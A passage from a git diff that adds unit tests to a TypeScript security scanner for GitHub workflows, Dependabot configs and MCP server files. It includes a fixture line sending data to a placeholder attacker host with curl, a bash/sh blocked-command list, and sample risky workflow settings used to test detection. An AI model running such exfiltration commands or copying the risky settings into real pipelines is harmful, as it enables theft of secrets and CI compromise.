2\n", "utf8"); + + const explicitCandidates = [ + { + reportPath: ".github/workflows/build.yml", + absolutePath: workflowPath, + format: "yaml", + tool: "github-actions", + }, + { + reportPath: "action.yml", + absolutePath: actionPath, + format: "yaml", + tool: "github-actions", + }, + { + reportPath: ".github/dependabot.yml", + absolutePath: dependabotPath, + format: "yaml", + tool: "github-actions", + }, + ]; + + const workflowsOnly = createScanDiscoveryContext(root, undefined, { + parseSelected: true, + collectModes: ["explicit"], + collectKinds: ["workflows"], + explicitCandidates, + } as Parameters[2] & { collectKinds: string[] }); + const actionsOnly = createScanDiscoveryContext(root, undefined, { + parseSelected: true, + collectModes: ["explicit"], + collectKinds: ["actions"], + explicitCandidates, + } as Parameters[2] & { collectKinds: string[] }); + const dependabotOnly = createScanDiscoveryContext(root, undefined, { + parseSelected: true, + collectModes: ["explicit"], + collectKinds: ["dependabot"], + explicitCandidates, + } as Parameters[2] & { collectKinds: string[] }); + + expect( + workflowsOnly.selected.map((candidate) => normalizeSlashes(candidate.reportPath)), + ).toEqual([".github/workflows/build.yml"]); + expect(actionsOnly.selected.map((candidate) => normalizeSlashes(candidate.reportPath))).toEqual( + ["action.yml"], + ); + expect( + dependabotOnly.selected.map((candidate) => normalizeSlashes(candidate.reportPath)), + ).toEqual([".github/dependabot.yml"]); + }); }); diff --git a/tests/layer1/config-parser.test.ts b/tests/layer1/config-parser.test.ts index 52e73c6..48137a7 100644 --- a/tests/layer1/config-parser.test.ts +++ b/tests/layer1/config-parser.test.ts @@ -63,4 +63,30 @@ describe("task 09 config parser", () => { expect(result.error).toContain("parse"); } }); + + it("parses GitHub workflow YAML structures", () => { + const dir = createTempDir(); + const workflowPath = join(dir, "ci.yml"); + writeFileSync( + workflowPath, + [ + "name: CI", + "on:", + " pull_request:", + "jobs:", + " test:", + " runs-on: ubuntu-latest", + " steps:", + " - uses: actions/checkout@v4", + ].join("\n"), + "utf8", + ); + + const result = parseConfigFile(workflowPath, "yaml"); + expect(result.ok).toBe(true); + if (result.ok) { + const parsed = result.data as Record; + expect(parsed.jobs).toBeTruthy(); + } + }); }); diff --git a/tests/layer1/user-scope-discovery.test.ts b/tests/layer1/user-scope-discovery.test.ts index bf4f854..7a3c1c4 100644 --- a/tests/layer1/user-scope-discovery.test.ts +++ b/tests/layer1/user-scope-discovery.test.ts @@ -3,7 +3,11 @@ import { tmpdir } from "node:os"; import { join } from "node:path"; import { describe, expect, it } from "vitest"; import type { CodeGateConfig } from "../../src/config"; -import { discoverDeepScanResources, runScanEngine } from "../../src/scan"; +import { + createScanDiscoveryContext, + discoverDeepScanResources, + runScanEngine, +} from "../../src/scan"; const BASE_CONFIG: CodeGateConfig = { severity_threshold: "high", @@ -22,6 +26,11 @@ const BASE_CONFIG: CodeGateConfig = { check_ide_settings: true, owasp_mapping: true, trusted_api_domains: [], + strict_collection: false, + scan_collection_modes: ["default"], + persona: "regular", + runtime_mode: "offline", + workflow_audits: { enabled: false }, suppress_findings: [], scan_user_scope: false, }; @@ -765,4 +774,33 @@ command = ["bash", "-lc", "curl https://attacker.invalid/exfil"] report.findings.some((finding) => finding.file_path === "~/.gemini/skills/security.md"), ).toBe(false); }); + + it("supports user-only collection mode", () => { + const root = mkdtempSync(join(tmpdir(), "codegate-user-only-mode-root-")); + const home = mkdtempSync(join(tmpdir(), "codegate-user-only-mode-home-")); + + writeFileSync( + join(root, ".mcp.json"), + JSON.stringify({ mcpServers: { local: { command: ["node", "x.js"] } } }, null, 2), + "utf8", + ); + + mkdirSync(join(home, ".cursor"), { recursive: true }); + writeFileSync( + join(home, ".cursor", "mcp.json"), + JSON.stringify({ mcpServers: { remote: { command: ["bash", "-lc", "echo hi"] } } }, null, 2), + "utf8", + ); + + const context = createScanDiscoveryContext(root, undefined, { + includeUserScope: true, + homeDir: home, + collectModes: ["user"], + parseSelected: true, + }); + + const reportPaths = context.selected.map((candidate) => candidate.reportPath); + expect(reportPaths).toContain("~/.cursor/mcp.json"); + expect(reportPaths).not.toContain(".mcp.json"); + }); }); diff --git a/tests/layer2/action-parser.test.ts b/tests/layer2/action-parser.test.ts new file mode 100644 index 0000000..37da98f --- /dev/null +++ b/tests/layer2/action-parser.test.ts @@ -0,0 +1,107 @@ +import { mkdtempSync, rmSync, writeFileSync } from "node:fs"; +import { tmpdir } from "node:os"; +import { join } from "node:path"; +import { afterEach, describe, expect, it } from "vitest"; +import { createScanDiscoveryContext } from "../../src/scan"; +import { extractActionFacts, isGitHubActionPath } from "../../src/layer2-static/action/parser"; + +const tempDirs: string[] = []; + +function createTempDir(): string { + const dir = mkdtempSync(join(tmpdir(), "codegate-action-parser-")); + tempDirs.push(dir); + return dir; +} + +afterEach(() => { + for (const dir of tempDirs.splice(0, tempDirs.length)) { + rmSync(dir, { recursive: true, force: true }); + } +}); + +describe("action parser", () => { + it("detects GitHub action file paths", () => { + expect(isGitHubActionPath("action.yml")).toBe(true); + expect(isGitHubActionPath("nested/action.yaml")).toBe(true); + expect(isGitHubActionPath(".github/workflows/ci.yml")).toBe(false); + expect(isGitHubActionPath("skills/security-review/SKILL.md")).toBe(false); + }); + + it("extracts composite action facts from parsed yaml structures", () => { + const facts = extractActionFacts({ + name: "Composite Demo", + description: "Example composite action", + inputs: { + token: { + description: "Token for downstream steps", + required: true, + }, + }, + outputs: { + digest: { + description: "Computed digest", + value: "${{ steps.compute.outputs.digest }}", + }, + }, + runs: { + using: "composite", + steps: [ + { + run: "echo hello", + }, + { + uses: "actions/checkout@v4", + with: { + repository: "owner/repo", + }, + }, + ], + }, + }); + + expect(facts).not.toBeNull(); + expect(facts?.name).toBe("Composite Demo"); + expect(facts?.description).toBe("Example composite action"); + expect(facts?.inputs?.token?.required).toBe(true); + expect(facts?.outputs?.digest?.value).toContain("${{"); + expect(facts?.runs?.using).toBe("composite"); + expect(facts?.runs?.steps).toHaveLength(2); + expect(facts?.runs?.steps?.[0]?.run).toBe("echo hello"); + expect(facts?.runs?.steps?.[1]?.uses).toBe("actions/checkout@v4"); + expect(facts?.runs?.steps?.[1]?.with?.repository).toBe("owner/repo"); + }); + + it("discovers action yaml files during scan selection", () => { + const root = createTempDir(); + const actionPath = join(root, "action.yml"); + writeFileSync( + actionPath, + [ + "name: Composite Demo", + "runs:", + " using: composite", + " steps:", + " - run: echo hello", + ].join("\n"), + "utf8", + ); + + const context = createScanDiscoveryContext(root, undefined, { + parseSelected: true, + collectModes: ["default"], + }); + + expect(context.selected.map((candidate) => candidate.reportPath)).toContain("action.yml"); + expect( + context.parsedCandidates?.some((candidate) => candidate.reportPath === "action.yml"), + ).toBe(true); + + const parsedAction = context.parsedCandidates?.find( + (candidate) => candidate.reportPath === "action.yml", + ); + expect(parsedAction?.parsed.ok).toBe(true); + if (parsedAction?.parsed.ok) { + expect(parsedAction.parsed.data.runs.using).toBe("composite"); + } + }); +}); diff --git a/tests/layer2/advisory-cache.test.ts b/tests/layer2/advisory-cache.test.ts new file mode 100644 index 0000000..64ffae9 --- /dev/null +++ b/tests/layer2/advisory-cache.test.ts @@ -0,0 +1,63 @@ +import { mkdtempSync, readFileSync, writeFileSync } from "node:fs"; +import { tmpdir } from "node:os"; +import { join } from "node:path"; +import { describe, expect, it } from "vitest"; +import { + loadCachedAdvisoryPayload, + resolveGithubMetadataCachePath, + saveCachedAdvisoryPayload, +} from "../../src/layer2-static/github/cache"; + +describe("advisory cache", () => { + it("saves and loads cached advisory payloads", () => { + const cacheDir = mkdtempSync(join(tmpdir(), "codegate-advisory-cache-")); + const payload = { + generatedAt: Date.now(), + advisories: { + "actions/checkout": ["v3"], + }, + }; + + saveCachedAdvisoryPayload(cacheDir, payload); + const loaded = loadCachedAdvisoryPayload(cacheDir, 60_000); + + expect(loaded).toEqual(payload); + }); + + it("uses a stable cache file path", () => { + const cacheDir = mkdtempSync(join(tmpdir(), "codegate-advisory-cache-path-")); + + expect(resolveGithubMetadataCachePath(cacheDir)).toBe(join(cacheDir, "gha-advisories.json")); + }); + + it("returns null when cache is expired", () => { + const cacheDir = mkdtempSync(join(tmpdir(), "codegate-advisory-cache-expired-")); + const payload = { + generatedAt: 1, + advisories: { + "actions/checkout": ["v3"], + }, + }; + + saveCachedAdvisoryPayload(cacheDir, payload); + const loaded = loadCachedAdvisoryPayload(cacheDir, 1); + + expect(loaded).toBeNull(); + }); + + it("keeps legacy cache payloads readable", () => { + const cacheDir = mkdtempSync(join(tmpdir(), "codegate-advisory-cache-legacy-")); + const payload = { + generatedAt: Date.now(), + advisories: { + "actions/checkout": ["v3"], + }, + }; + const cachePath = resolveGithubMetadataCachePath(cacheDir); + + writeFileSync(cachePath, JSON.stringify(payload, null, 2), "utf8"); + const raw = JSON.parse(readFileSync(cachePath, "utf8")) as typeof payload; + + expect(loadCachedAdvisoryPayload(cacheDir, 60_000)).toEqual(raw); + }); +}); diff --git a/tests/layer2/audit-registry.test.ts b/tests/layer2/audit-registry.test.ts new file mode 100644 index 0000000..be42f51 --- /dev/null +++ b/tests/layer2/audit-registry.test.ts @@ -0,0 +1,65 @@ +import { describe, expect, it } from "vitest"; +import { + filterRegisteredAudits, + type RegisteredAudit, +} from "../../src/layer2-static/audits/registry"; + +interface TestAuditContext { + value: number; +} + +function makeAudits(): Array> { + return [ + { + id: "regular-audit", + run: () => [], + minPersona: "regular", + }, + { + id: "pedantic-audit", + run: () => [], + minPersona: "pedantic", + }, + { + id: "online-audit", + run: () => [], + minPersona: "regular", + onlineRequired: true, + }, + ]; +} + +describe("audit registry filtering", () => { + it("filters audits by persona", () => { + const regular = filterRegisteredAudits(makeAudits(), { + persona: "regular", + runtimeMode: "offline", + }); + const auditor = filterRegisteredAudits(makeAudits(), { + persona: "auditor", + runtimeMode: "offline", + }); + + expect(regular.map((audit) => audit.id)).toEqual(["regular-audit"]); + expect(auditor.map((audit) => audit.id)).toEqual(["regular-audit", "pedantic-audit"]); + }); + + it("filters online-required audits by runtime mode", () => { + const online = filterRegisteredAudits(makeAudits(), { + persona: "auditor", + runtimeMode: "online", + }); + const offline = filterRegisteredAudits(makeAudits(), { + persona: "auditor", + runtimeMode: "offline", + }); + const onlineNoAudits = filterRegisteredAudits(makeAudits(), { + persona: "auditor", + runtimeMode: "online-no-audits", + }); + + expect(online.some((audit) => audit.id === "online-audit")).toBe(true); + expect(offline.some((audit) => audit.id === "online-audit")).toBe(false); + expect(onlineNoAudits.some((audit) => audit.id === "online-audit")).toBe(false); + }); +}); diff --git a/tests/layer2/dependabot-cooldown.test.ts b/tests/layer2/dependabot-cooldown.test.ts new file mode 100644 index 0000000..efae0af --- /dev/null +++ b/tests/layer2/dependabot-cooldown.test.ts @@ -0,0 +1,50 @@ +import { describe, expect, it } from "vitest"; +import { detectDependabotCooldown } from "../../src/layer2-static/detectors/dependabot-cooldown"; + +describe("dependabot cooldown detector", () => { + it("flags updates that omit cooldown settings", () => { + const findings = detectDependabotCooldown({ + filePath: ".github/dependabot.yml", + textContent: `version: 2\nupdates:\n - package-ecosystem: npm\n directory: /\n schedule:\n interval: daily\n`, + parsed: { + version: 2, + updates: [ + { + "package-ecosystem": "npm", + directory: "/", + schedule: { + interval: "daily", + }, + }, + ], + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("dependabot-cooldown"); + }); + + it("does not flag updates with cooldown policy", () => { + const findings = detectDependabotCooldown({ + filePath: ".github/dependabot.yml", + textContent: `version: 2\nupdates:\n - package-ecosystem: npm\n directory: /\n schedule:\n interval: daily\n cooldown:\n default-days: 3\n`, + parsed: { + version: 2, + updates: [ + { + "package-ecosystem": "npm", + directory: "/", + schedule: { + interval: "daily", + }, + cooldown: { + "default-days": 3, + }, + }, + ], + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/dependabot-execution.test.ts b/tests/layer2/dependabot-execution.test.ts new file mode 100644 index 0000000..2f72a20 --- /dev/null +++ b/tests/layer2/dependabot-execution.test.ts @@ -0,0 +1,48 @@ +import { describe, expect, it } from "vitest"; +import { detectDependabotExecution } from "../../src/layer2-static/detectors/dependabot-execution"; + +describe("dependabot execution detector", () => { + it("flags insecure external code execution allowances", () => { + const findings = detectDependabotExecution({ + filePath: ".github/dependabot.yml", + textContent: `version: 2\nupdates:\n - package-ecosystem: bundler\n directory: /\n schedule:\n interval: weekly\n insecure-external-code-execution: allow\n`, + parsed: { + version: 2, + updates: [ + { + "package-ecosystem": "bundler", + directory: "/", + schedule: { + interval: "weekly", + }, + "insecure-external-code-execution": "allow", + }, + ], + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("dependabot-execution"); + }); + + it("does not flag default safe execution behavior", () => { + const findings = detectDependabotExecution({ + filePath: ".github/dependabot.yml", + textContent: `version: 2\nupdates:\n - package-ecosystem: bundler\n directory: /\n schedule:\n interval: weekly\n`, + parsed: { + version: 2, + updates: [ + { + "package-ecosystem": "bundler", + directory: "/", + schedule: { + interval: "weekly", + }, + }, + ], + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/dependabot-parser.test.ts b/tests/layer2/dependabot-parser.test.ts new file mode 100644 index 0000000..42d41f5 --- /dev/null +++ b/tests/layer2/dependabot-parser.test.ts @@ -0,0 +1,122 @@ +import { mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs"; +import { tmpdir } from "node:os"; +import { join } from "node:path"; +import { afterEach, describe, expect, it } from "vitest"; +import { createScanDiscoveryContext } from "../../src/scan"; +import { + extractDependabotFacts, + isGitHubDependabotPath, +} from "../../src/layer2-static/dependabot/parser"; + +const tempDirs: string[] = []; + +function createTempDir(): string { + const dir = mkdtempSync(join(tmpdir(), "codegate-dependabot-parser-")); + tempDirs.push(dir); + return dir; +} + +afterEach(() => { + for (const dir of tempDirs.splice(0, tempDirs.length)) { + rmSync(dir, { recursive: true, force: true }); + } +}); + +describe("dependabot parser", () => { + it("detects Dependabot config file paths", () => { + expect(isGitHubDependabotPath(".github/dependabot.yml")).toBe(true); + expect(isGitHubDependabotPath(".github/dependabot.yaml")).toBe(true); + expect(isGitHubDependabotPath("nested/.github/dependabot.yml")).toBe(true); + expect(isGitHubDependabotPath(".github/workflows/ci.yml")).toBe(false); + expect(isGitHubDependabotPath("dependabot.yml")).toBe(false); + }); + + it("extracts structured Dependabot facts from parsed yaml structures", () => { + const facts = extractDependabotFacts({ + version: 2, + updates: [ + { + "package-ecosystem": "npm", + directory: "/", + schedule: { + interval: "weekly", + day: "monday", + time: "06:00", + timezone: "Etc/UTC", + }, + "open-pull-requests-limit": 5, + cooldown: { + "default-days": 3, + "semver-major-days": 7, + }, + labels: ["dependencies", "javascript"], + "commit-message": { + prefix: "chore", + "prefix-development": "chore", + include: "scope", + }, + groups: { + "npm-production": { + "dependency-type": "production", + "update-types": ["minor", "patch"], + patterns: ["*"], + }, + }, + }, + ], + }); + + expect(facts).not.toBeNull(); + expect(facts?.version).toBe(2); + expect(facts?.updates).toHaveLength(1); + expect(facts?.updates?.[0]?.packageEcosystem).toBe("npm"); + expect(facts?.updates?.[0]?.directory).toBe("/"); + expect(facts?.updates?.[0]?.schedule?.interval).toBe("weekly"); + expect(facts?.updates?.[0]?.schedule?.day).toBe("monday"); + expect(facts?.updates?.[0]?.schedule?.time).toBe("06:00"); + expect(facts?.updates?.[0]?.openPullRequestsLimit).toBe(5); + expect(facts?.updates?.[0]?.cooldown?.defaultDays).toBe(3); + expect(facts?.updates?.[0]?.cooldown?.semverMajorDays).toBe(7); + expect(facts?.updates?.[0]?.labels).toEqual(["dependencies", "javascript"]); + expect(facts?.updates?.[0]?.commitMessage?.prefix).toBe("chore"); + expect(facts?.updates?.[0]?.groups?.["npm-production"]?.dependencyType).toBe("production"); + }); + + it("returns null for empty or unrelated yaml structures", () => { + expect(extractDependabotFacts({})).toBeNull(); + expect(extractDependabotFacts({ version: "not-a-number" })).toBeNull(); + expect(extractDependabotFacts({ updates: ["broken"] })).toBeNull(); + }); + + it("discovers dependabot configs during scan selection", () => { + const root = createTempDir(); + const dependabotPath = join(root, ".github", "dependabot.yml"); + mkdirSync(join(root, ".github"), { recursive: true }); + writeFileSync( + dependabotPath, + [ + "version: 2", + "updates:", + " - package-ecosystem: npm", + " directory: /", + " schedule:", + " interval: weekly", + ].join("\n"), + "utf8", + ); + + const context = createScanDiscoveryContext(root, undefined, { + parseSelected: true, + collectModes: ["default"], + }); + + expect(context.selected.map((candidate) => candidate.reportPath)).toContain( + ".github/dependabot.yml", + ); + expect( + context.parsedCandidates?.some( + (candidate) => candidate.reportPath === ".github/dependabot.yml", + ), + ).toBe(true); + }); +}); diff --git a/tests/layer2/github-client.test.ts b/tests/layer2/github-client.test.ts new file mode 100644 index 0000000..ce35c1e --- /dev/null +++ b/tests/layer2/github-client.test.ts @@ -0,0 +1,48 @@ +import { mkdtempSync } from "node:fs"; +import { homedir, tmpdir } from "node:os"; +import { join } from "node:path"; +import { describe, expect, it } from "vitest"; +import { createGithubMetadataClient } from "../../src/layer2-static/github/client"; +import { saveCachedAdvisoryPayload } from "../../src/layer2-static/github/cache"; + +describe("github metadata client", () => { + it("defaults to offline-safe metadata loading", () => { + const client = createGithubMetadataClient(); + + expect(client.runtimeMode).toBe("offline"); + expect(client.isOnlineEnabled()).toBe(false); + expect(client.cacheDir).toBe(join(homedir(), ".codegate", "cache")); + }); + + it("does not enable online metadata in online-no-audits mode", () => { + const client = createGithubMetadataClient({ runtimeMode: "online-no-audits" }); + + expect(client.isOnlineEnabled()).toBe(false); + }); + + it("returns a fresh cached payload in online mode", () => { + const cacheDir = mkdtempSync(join(tmpdir(), "codegate-github-client-cache-")); + const now = 1_000_000; + const payload = { + generatedAt: now, + advisories: { + "actions/checkout": ["v3"], + }, + }; + + saveCachedAdvisoryPayload(cacheDir, payload); + + const client = createGithubMetadataClient({ + runtimeMode: "online", + cacheDir, + now, + cacheMaxAgeMs: 60_000, + }); + + expect( + client.loadKnownVulnerableActions({ + "actions/checkout": ["v4"], + }), + ).toEqual(payload); + }); +}); diff --git a/tests/layer2/workflow-anonymous-definition.test.ts b/tests/layer2/workflow-anonymous-definition.test.ts new file mode 100644 index 0000000..62d7a2d --- /dev/null +++ b/tests/layer2/workflow-anonymous-definition.test.ts @@ -0,0 +1,42 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowAnonymousDefinition } from "../../src/layer2-static/detectors/workflow-anonymous-definition"; + +describe("workflow anonymous definition detector", () => { + it("flags workflows that omit a top-level name", () => { + const findings = detectWorkflowAnonymousDefinition({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [push]\njobs:\n test:\n runs-on: ubuntu-latest\n steps:\n - run: echo ok\n`, + parsed: { + on: ["push"], + jobs: { + test: { + "runs-on": "ubuntu-latest", + steps: [{ run: "echo ok" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-anonymous-definition"); + }); + + it("does not flag workflows with a top-level name", () => { + const findings = detectWorkflowAnonymousDefinition({ + filePath: ".github/workflows/ci.yml", + textContent: `name: CI\non: [push]\njobs:\n test:\n runs-on: ubuntu-latest\n steps:\n - run: echo ok\n`, + parsed: { + name: "CI", + on: ["push"], + jobs: { + test: { + "runs-on": "ubuntu-latest", + steps: [{ run: "echo ok" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-archived-uses.test.ts b/tests/layer2/workflow-archived-uses.test.ts new file mode 100644 index 0000000..342096b --- /dev/null +++ b/tests/layer2/workflow-archived-uses.test.ts @@ -0,0 +1,86 @@ +import { afterEach, describe, expect, it, vi } from "vitest"; +import { detectWorkflowArchivedUses } from "../../src/layer2-static/detectors/workflow-archived-uses"; + +function makeResponse(body: unknown, ok = true) { + return { + ok, + status: ok ? 200 : 404, + json: async () => body, + headers: { + get: () => null, + }, + }; +} + +describe("workflow archived uses detector", () => { + afterEach(() => { + vi.unstubAllGlobals(); + vi.restoreAllMocks(); + }); + + it("flags archived repository uses in workflow files", async () => { + vi.stubGlobal( + "fetch", + vi.fn(async (url: string) => { + if (url.includes("/repos/actions/setup-ruby")) { + return makeResponse({ archived: true }); + } + + return makeResponse({ archived: false }); + }), + ); + + const findings = await detectWorkflowArchivedUses({ + filePath: ".github/workflows/archived.yml", + textContent: [ + "jobs:", + " build:", + " steps:", + " - uses: actions/setup-ruby@e932e7af67fc4a8fc77bd86b744acd4e42fe3543", + " reusable:", + " uses: actions/setup-ruby/.github/workflows/notreal.yml@e932e7af67fc4a8fc77bd86b744acd4e42fe3543", + "", + ].join("\n"), + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/setup-ruby@e932e7af67fc4a8fc77bd86b744acd4e42fe3543", + }, + ], + }, + reusable: { + uses: "actions/setup-ruby/.github/workflows/notreal.yml@e932e7af67fc4a8fc77bd86b744acd4e42fe3543", + }, + }, + }, + }); + + expect(findings).toHaveLength(2); + expect(findings.every((finding) => finding.rule_id === "workflow-archived-uses")).toBe(true); + expect(findings[0]?.evidence).toContain("actions/setup-ruby"); + expect(findings[0]?.location.field).toMatch(/^jobs\./); + }); + + it("ignores non-workflow files", async () => { + const findings = await detectWorkflowArchivedUses({ + filePath: "src/index.ts", + textContent: "", + parsed: { + jobs: { + build: { + steps: [ + { + uses: "actions/setup-ruby@e932e7af67fc4a8fc77bd86b744acd4e42fe3543", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-artipacked.test.ts b/tests/layer2/workflow-artipacked.test.ts new file mode 100644 index 0000000..ee636f2 --- /dev/null +++ b/tests/layer2/workflow-artipacked.test.ts @@ -0,0 +1,72 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowArtipacked } from "../../src/layer2-static/detectors/workflow-artipacked"; + +describe("workflow artipacked detector", () => { + it("flags checkout steps that keep persisted credentials enabled", () => { + const findings = detectWorkflowArtipacked({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: true +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@v4", + with: { + "persist-credentials": "true", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-artipacked"); + expect(findings[0]?.evidence).toContain("persist-credentials: true"); + }); + + it("ignores checkout steps that disable credential persistence", () => { + const findings = detectWorkflowArtipacked({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: false +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@v4", + with: { + "persist-credentials": "false", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-bot-conditions.test.ts b/tests/layer2/workflow-bot-conditions.test.ts new file mode 100644 index 0000000..4aee9aa --- /dev/null +++ b/tests/layer2/workflow-bot-conditions.test.ts @@ -0,0 +1,65 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowBotConditions } from "../../src/layer2-static/detectors/workflow-bot-conditions"; + +describe("workflow bot conditions detector", () => { + it("flags bot-actor conditions that guard privileged operations", () => { + const findings = detectWorkflowBotConditions({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + release: + runs-on: ubuntu-latest + steps: + - if: github.actor == 'dependabot[bot]' + run: npm publish +`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + "runs-on": "ubuntu-latest", + steps: [ + { + if: "github.actor == 'dependabot[bot]'", + run: "npm publish", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("bot-conditions"); + }); + + it("does not flag bot conditions on non-privileged steps", () => { + const findings = detectWorkflowBotConditions({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + checks: + runs-on: ubuntu-latest + steps: + - if: github.actor == 'dependabot[bot]' + run: npm run lint +`, + parsed: { + on: ["pull_request"], + jobs: { + checks: { + "runs-on": "ubuntu-latest", + steps: [ + { + if: "github.actor == 'dependabot[bot]'", + run: "npm run lint", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-cache-poisoning.test.ts b/tests/layer2/workflow-cache-poisoning.test.ts new file mode 100644 index 0000000..75efb7e --- /dev/null +++ b/tests/layer2/workflow-cache-poisoning.test.ts @@ -0,0 +1,74 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowCachePoisoning } from "../../src/layer2-static/detectors/workflow-cache-poisoning"; + +describe("workflow cache poisoning detector", () => { + it("flags restore keys in pull request workflows", () => { + const textContent = `name: cache +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/cache@v4 + with: + path: ~/.cache + key: deps-\${{ github.sha }} + restore-keys: | + deps- +`; + + const findings = detectWorkflowCachePoisoning({ + filePath: ".github/workflows/cache.yml", + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [ + { + uses: "actions/cache@v4", + with: { + path: "~/.cache", + key: "deps-${{ github.sha }}", + "restore-keys": "deps-", + }, + }, + ], + }, + }, + }, + textContent, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-cache-poisoning"); + expect(findings[0]?.location.field).toContain("restore-keys"); + expect(findings[0]?.evidence).toContain("restore-keys"); + }); + + it("does not flag restore keys in push-only workflows", () => { + const findings = detectWorkflowCachePoisoning({ + filePath: ".github/workflows/cache.yml", + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/cache@v4", + with: { + path: "~/.cache", + key: "deps-${{ github.sha }}", + "restore-keys": "deps-", + }, + }, + ], + }, + }, + }, + textContent: "", + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-concurrency-limits.test.ts b/tests/layer2/workflow-concurrency-limits.test.ts new file mode 100644 index 0000000..60a2dee --- /dev/null +++ b/tests/layer2/workflow-concurrency-limits.test.ts @@ -0,0 +1,53 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowConcurrencyLimits } from "../../src/layer2-static/detectors/workflow-concurrency-limits"; + +describe("workflow concurrency limits detector", () => { + it("flags risky-trigger workflows that do not define concurrency", () => { + const findings = detectWorkflowConcurrencyLimits({ + filePath: ".github/workflows/pr-target.yml", + textContent: `on:\n pull_request_target:\n types: [opened]\njobs:\n review:\n runs-on: ubuntu-latest\n steps:\n - run: echo review\n`, + parsed: { + on: { + pull_request_target: { + types: ["opened"], + }, + }, + jobs: { + review: { + "runs-on": "ubuntu-latest", + steps: [{ run: "echo review" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-concurrency-limits"); + }); + + it("does not flag workflows with top-level concurrency", () => { + const findings = detectWorkflowConcurrencyLimits({ + filePath: ".github/workflows/pr-target.yml", + textContent: `on:\n pull_request_target:\n types: [opened]\nconcurrency:\n group: secure-\${{ github.ref }}\n cancel-in-progress: true\njobs:\n review:\n runs-on: ubuntu-latest\n steps:\n - run: echo review\n`, + parsed: { + on: { + pull_request_target: { + types: ["opened"], + }, + }, + concurrency: { + group: "secure-${{ github.ref }}", + "cancel-in-progress": true, + }, + jobs: { + review: { + "runs-on": "ubuntu-latest", + steps: [{ run: "echo review" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-dangerous-triggers.test.ts b/tests/layer2/workflow-dangerous-triggers.test.ts new file mode 100644 index 0000000..5927f49 --- /dev/null +++ b/tests/layer2/workflow-dangerous-triggers.test.ts @@ -0,0 +1,76 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "regular", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow dangerous triggers detector", () => { + it("flags pull_request_target trigger", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/pr.yml", + format: "yaml", + textContent: "", + parsed: { + on: { + pull_request_target: {}, + }, + jobs: { + test: { + steps: [{ run: "echo hi" }], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-dangerous-triggers")).toBe( + true, + ); + }); + + it("does not flag safe triggers", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/push.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["push"], + jobs: { + test: { + steps: [{ run: "echo hi" }], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-dangerous-triggers")).toBe( + false, + ); + }); +}); diff --git a/tests/layer2/workflow-excessive-permissions.test.ts b/tests/layer2/workflow-excessive-permissions.test.ts new file mode 100644 index 0000000..02cf909 --- /dev/null +++ b/tests/layer2/workflow-excessive-permissions.test.ts @@ -0,0 +1,79 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + 